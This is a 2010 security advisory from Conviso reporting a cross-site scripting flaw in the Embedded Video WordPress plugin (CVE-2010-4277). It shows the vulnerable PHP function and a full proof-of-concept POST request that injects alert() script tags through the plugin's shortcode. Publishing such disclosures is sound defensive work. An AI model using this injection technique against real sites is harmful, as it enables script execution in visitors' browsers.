Suas aplicações são seguras?

Conheça a Conviso!

Embedded Video WordPress Plugin Cross Site Vulnerability (XSS) -CVE-2010-4277

Introduction

 

Copyright and Disclaimer

The information in this advisory is Copyright 2010 Conviso and provided so that the society can understand the risk they may be facing by running affected software, hardware or other components used on their systems. In case you wish to copy information from this advisory, you must either copy all of it or refer to this document (including our URL). No guarantee is provided for the accuracy of this information, or damage you may cause your systems in testing.

About Conviso

Founded on 2008 by a team of professionals working the IT Security market since 1997, Conviso is a consulting company specialized on network and application security services. Our values are based on the allocation of the adequate competencies on the field, a clear and direct speech with the market, collaboration and partnership with our customers and business partners and constant investments on methodology and research improvement.

This advisory has been discovered as part of a general investigation into the security of software used in the IT environments of our customers. For more information about our company and services provided, please check our website at www.conviso.com.br.

The Security Research

Conviso maintains a virtual team dedicated to explore our customer’s environments in order to identify technical vulnerabilities in software and hardware, developing real-world mitigation solutions and processes to maintain more secure environments. Leaded by Wagner Elias, our R&D Manager, this team is named Conviso Labs and also contribute to important world-class organizations projects and organizations.

The vulnerability described in this security advisory was discovered by Wagner Elias on October 20th 2010 during the Bug Hunting Day at Conviso Labs.

Issue Description

Embedded Video is a WordPress Plugin created by Jovel Stefan to easily embedded videos in blog posts. The videos can be uploaded to the web server or come from external portals (like YouTube, Google Video and others) and links to the video on the video portal or for download of the video can be automatically generated as well.

The plugin has a Cross Site Script (XSS) vulnerability.

Affected Components

Version 4.1 of Embedded Video Word Press Plugin.

Issue Mitigation

This problem was confirmed in the latest version of the plugin, other versions maybe also affected. The developer replied to the advisory in a very responsible manner but unfortunately there will be no updates due to the fact that this component is not maintained anymore.

CVSS Scoring System

The CVSS score is: 6.4

    • Base Score: 6.7

 

    • Temporal Score: 6.4

We used the following values to calculate the scores:

    • Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N

 

    • Temporal score is: E:F/RL:U/RC:C

 

Details

The file lembedded-video.php does not sanitize content variable, it is possible to inject malformed data by Javascript.

Code affected:

function embeddedvideo_plugin($content) {
$output = preg_replace_callback(REGEXP_1, ‘embeddedvideo_plugin_callback’, $content);
$output = preg_replace_callback(REGEXP_2, ‘embeddedvideo_plugin_callback’, $output);
$output = preg_replace_callback(REGEXP_3, ‘embeddedvideo_plugin_callback’, $output);
return ($output);
}

Request:

http://<server>/wordpress/wp-admin/post.php
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.12) Gecko/20101026
Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://<server>/wordpress/wp-admin/post.php?post=8&action=edit&message=1
C o o k i e : w o r d p r e s s _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3 7 0 b e 3 e e 9 1 = a d m i n
%7C1290110435%7C7f9fa1a66aec0259906ea15086aea0c8; wp-settings-time-1=1289940308;
w o r d p r e s s _ t e s t _ c o o k i e = W P + C o o k i e + c h e c k ;
w o r d p r e s s _ l o g g e d _ i n _ b b f a 5 b 7 2 6 c 6 b 7 a 9 c f 3 c d a 9 3 7 0 b e 3 e e 9 1 = a d m i n
%7C1290110435%7C68b064d813dd8bfaa5d2d2cdf757848e; wp-settings-1=m1%3Do
%26m6%3Dc%26m7%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786
_wpnonce=b2bc367f9c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost
% 3 D 8 % 2 6 a c t i o n % 3 D e d i t % 2 6 m e s s a g e
%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=post&original_
post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin
%2Fpost.php%3Fpost%3D8%26action%3Dedit&_wp_original_http_referer=http%3A%2F
%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action
% 3 D e d i t & p o s t _ I D = 8 & a u t o s a v e n o n c e = 9 6 2 9 3 9 1 7 c 9 & m e t a – b o x – o r d e r –
n o n c e = c 2 f e 5 5 3 5 c 4 & c l o s e d p o s t b o x e s n o n c e = b a d 9 d c 7 7 5 b & w p –
preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_v
isibility=public&visibility=public&post_password=&mm=11&jj=17&aa=2010&hh=00&mn=05&ss=33&hi
dden_mm=11&cur_mm=11&hidden_jj=17&cur_jj=17&hidden_aa=2010&cur_aa=2010&hidden_hh=00
&cur_hh=00&hidden_mn=05&cur_mn=36&original_publish=Update&save=Update&post_category
% 5 B % 5 D = 0 & p o s t _ c a t e g o r y % 5 B % 5 D = 1 & n e w c a t e g o r y = N e w + C a t e g o r y
+Name&newcategory_parent=-1&_ajax_nonce-add-category=62352e38f5&tax_input%5Bpost_tag
% 5 D = & n e w t a g % 5 B p o s t _ t a g
%5D=&post_title=testando&samplepermalinknonce=4a0d9c8491&content=%5Byoutube+%3Cscript
+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert
%281%29%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E+%3Cscript+type%3D%22text
%2Fjavascript%22%3E%2F%2F+%3C%21%5BCDATA%5B%0D%0Aalert%282%29%0D%0A%2F
%2F+%5D%5D%3E%3C%2Fscript%3E%5D&excerpt=&trackback_url=&meta%5B6%5D%5Bkey
%5D=_edit_last&_ajax_nonce=5453d93de8&meta%5B6%5D%5Bvalue%5D=1&meta%5B9%5D
%5Bkey%5D=_edit_lock&_ajax_nonce=5453d93de8&meta%5B9%5D%5Bvalue
%5D=1289954192&meta%5B8%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=5453d93de8&meta
% 5 B 8 % 5 D % 5 B v a l u e % 5 D = & m e t a k e y i n p u t = & m e t a v a l u e = & _ a j a x _ n o n c e – a d d –
meta=9453fa7f77&advanced_view=1&comment_status=open&ping_status=open&post_name=testan
do&post_author_override=1

Issue History

    • October 20, 2010: Issue discovered by Wagner Elias at Conviso Labs.

    • October 22, 2010: Issue informed to the author.

    • October 30, 2010: Author informed that the plugin is not maintained anymore.

    • December 17, 2010: Security Advisory published.
Originalmente postado no Blog da Conviso Application Security – Siga-nos no Twitter @conviso Google+

Tags

Deixe um comentário

topo
%d blogueiros gostam disto: